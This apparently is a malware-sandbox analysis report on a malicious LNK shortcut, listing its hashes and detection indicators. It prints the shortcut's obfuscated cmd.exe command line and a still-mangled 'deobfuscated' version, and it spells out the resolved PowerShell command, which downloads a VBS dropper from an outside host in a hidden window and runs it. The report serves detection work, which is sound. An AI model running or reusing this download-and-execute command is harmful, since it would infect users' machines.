Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
675d9b8bc81f9f22656fee729038560e
Sha1
1e248744243612781bff596923253eec7eb4446b
Sha256
c3ff9855cb9697f49eae943960bdf82ecac6ab1b9256e0fb63d6acf662cf2302
Sha384
0e55bf3a984c2c8d26d22cb1e9e3410c9aa85874f87be0957624e7f91de19e22faa2e31ac91c32adafd2a762c78ac050
Sha512
9847691a60f49541ab083ece9eca61c232a718cf4676f401b9651a696cecab228a2bb93768f7ec3241c9989a7254751edf2013793b276be8a2d89c79f18c6951
SSDeep
96:8YH9omrvxz+IIUa/5468GumkShpJsOCOvuJ:8YH9hZlcfjv
TLSH
D291BD101BF94218F2B38F39A5FDA32292717AD17D32952D4561CF4C7C24684A87AF77
Artefacts
Name
Value
LNK: Command Execution

cmd.exe /0DR5:2rz9 /DS6LR:1DJ76 /D/C "for /f "tokens=3" %A in ("z9 lvhum powershell 7m aqb") do for /f "tokens=2" %B in ("ij hidden vsm tegy4") do for /f "tokens=2" %C in ("4k0 IWR uwhg8 gou") do for /f "tokens=2" %D in ("qo Uri uk2h 91y 4x") do for /f "tokens=3" %E in ("84b h0pb OutFile kjx9r bp7zx") do for /f "tokens=4" %F in ("40og z9on5 7ebz https:// 58oa") do for /f "tokens=3" %G in ("lonz uf cyeza lvae") do for /f "tokens=4" %H in ("aml zyku 88 . 8ot o2e jb") do for /f "tokens=3" %I in ("adcug 2obhn botecoalto cqgd fm51 wv") do for /f "tokens=3" %J in ("kmj b6v56 . me2") do for /f "tokens=3" %K in ("ag jqzf sbs i4") do for /f "tokens=2" %L in ("xeize / je1") do for /f "tokens=3" %M in ("glktg jj8 wdnsr fr2 fq jhm") do for /f "tokens=3" %N in ("7d3j fgynu / 4el") do for /f "tokens=2" %O in ("nc1 809550 xmasz") do for /f "tokens=2" %P in ("zu2 / y5os8 a1 j4f8") do %A -w %B "%C -%D %F%G%H%I%J%K%L%M%N%O%P -%E $env:tmp\fk8a03.vbs" && %tmp%\fk8a03.vbs"

Deobfuscated PowerShell

7m "aqb) do for /f tokens=2 %B in (ij" "hidden" "vsm" "tegy4) do for /f tokens=2 %C in (4k0" "IWR" "uwhg8" "gou) do for /f tokens=2 %D in (qo" "Uri" "uk2h" 91 "4x) do for /f tokens=3 %E in (84b" "h0pb" "OutFile" "kjx9r" "bp7zx) do for /f tokens=4 %F in (40og" "z9on5" "7ebz" "https://" "58oa) do for /f tokens=3 %G in (lonz" "uf" "cyeza" "lvae) do for /f tokens=4 %H in (aml" "zyku" 88 "." "8ot" "o2e" "jb) do for /f tokens=3 %I in (adcug" "2obhn" "botecoalto" "cqgd" "fm51" "wv) do for /f tokens=3 %J in (kmj" "b6v56" "." "me2) do for /f tokens=3 %K in (ag" "jqzf" "sbs" "i4) do for /f tokens=2 %L in (xeize" "/" "je1) do for /f tokens=3 %M in (glktg" "jj8" "wdnsr" "fr2" "fq" "jhm) do for /f tokens=3 %N in (7d3j" "fgynu" "/" "4el) do for /f tokens=2 %O in (nc1" 809550 "xmasz) do for /f tokens=2 %P in (zu2" "/" "y5os8" "a1" "j4f8) do %A -w %B %C" "-%D" "%F%G%H%I%J%K%L%M%N%O%P" "-%E" $env:tmp\fk8a03.vbs && %tmp%\fk8a03.vbs

Note: the text above is still the obfuscated `for /f` chain, not its resolved form. Applying each `tokens=N` selection to its quoted string in the LNK command line above yields the command that actually runs: `powershell -w hidden "IWR -Uri https://cyeza.botecoalto.sbs/wdnsr/809550/ -OutFile $env:tmp\fk8a03.vbs" && %tmp%\fk8a03.vbs` — a hidden-window download of a VBS dropper to the user's temp directory followed by its execution. The resolved host, the `%tmp%\fk8a03.vbs` path and the cmd.exe-spawns-powershell-with-`IWR` pattern are the detection-relevant indicators here.

675d9b8bc81f9f22656fee729038560e (4.51 KB)
No malware configuration was found at this point.
Artefacts
Name
Value Location
LNK: Command Execution

cmd.exe /0DR5:2rz9 /DS6LR:1DJ76 /D/C "for /f "tokens=3" %A in ("z9 lvhum powershell 7m aqb") do for /f "tokens=2" %B in ("ij hidden vsm tegy4") do for /f "tokens=2" %C in ("4k0 IWR uwhg8 gou") do for /f "tokens=2" %D in ("qo Uri uk2h 91y 4x") do for /f "tokens=3" %E in ("84b h0pb OutFile kjx9r bp7zx") do for /f "tokens=4" %F in ("40og z9on5 7ebz https:// 58oa") do for /f "tokens=3" %G in ("lonz uf cyeza lvae") do for /f "tokens=4" %H in ("aml zyku 88 . 8ot o2e jb") do for /f "tokens=3" %I in ("adcug 2obhn botecoalto cqgd fm51 wv") do for /f "tokens=3" %J in ("kmj b6v56 . me2") do for /f "tokens=3" %K in ("ag jqzf sbs i4") do for /f "tokens=2" %L in ("xeize / je1") do for /f "tokens=3" %M in ("glktg jj8 wdnsr fr2 fq jhm") do for /f "tokens=3" %N in ("7d3j fgynu / 4el") do for /f "tokens=2" %O in ("nc1 809550 xmasz") do for /f "tokens=2" %P in ("zu2 / y5os8 a1 j4f8") do %A -w %B "%C -%D %F%G%H%I%J%K%L%M%N%O%P -%E $env:tmp\fk8a03.vbs" && %tmp%\fk8a03.vbs"

Malicious

675d9b8bc81f9f22656fee729038560e

Deobfuscated PowerShell

7m "aqb) do for /f tokens=2 %B in (ij" "hidden" "vsm" "tegy4) do for /f tokens=2 %C in (4k0" "IWR" "uwhg8" "gou) do for /f tokens=2 %D in (qo" "Uri" "uk2h" 91 "4x) do for /f tokens=3 %E in (84b" "h0pb" "OutFile" "kjx9r" "bp7zx) do for /f tokens=4 %F in (40og" "z9on5" "7ebz" "https://" "58oa) do for /f tokens=3 %G in (lonz" "uf" "cyeza" "lvae) do for /f tokens=4 %H in (aml" "zyku" 88 "." "8ot" "o2e" "jb) do for /f tokens=3 %I in (adcug" "2obhn" "botecoalto" "cqgd" "fm51" "wv) do for /f tokens=3 %J in (kmj" "b6v56" "." "me2) do for /f tokens=3 %K in (ag" "jqzf" "sbs" "i4) do for /f tokens=2 %L in (xeize" "/" "je1) do for /f tokens=3 %M in (glktg" "jj8" "wdnsr" "fr2" "fq" "jhm) do for /f tokens=3 %N in (7d3j" "fgynu" "/" "4el) do for /f tokens=2 %O in (nc1" 809550 "xmasz) do for /f tokens=2 %P in (zu2" "/" "y5os8" "a1" "j4f8) do %A -w %B %C" "-%D" "%F%G%H%I%J%K%L%M%N%O%P" "-%E" $env:tmp\fk8a03.vbs && %tmp%\fk8a03.vbs

Malicious

675d9b8bc81f9f22656fee729038560e > LNK CommandLine > [PowerShell Command]
